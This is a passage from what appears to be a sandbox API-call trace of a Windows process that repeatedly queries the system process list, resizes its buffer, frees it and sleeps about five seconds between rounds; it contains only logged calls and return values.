BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.125] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.127] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.128] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.140] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.144] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.169] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.171] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.171] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.174] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.190] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.205] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.206] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.221] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.237] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.237] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.249] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.251] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.274] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.283] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.301] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.318] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.326] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.330] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.343] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.344] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.344] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.348] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.349] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.359] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.364] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.376] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.393] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.404] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.405] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.409] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.421] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.425] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.436] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0118.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0118.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0118.440] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0118.452] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0118.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0118.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0118.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 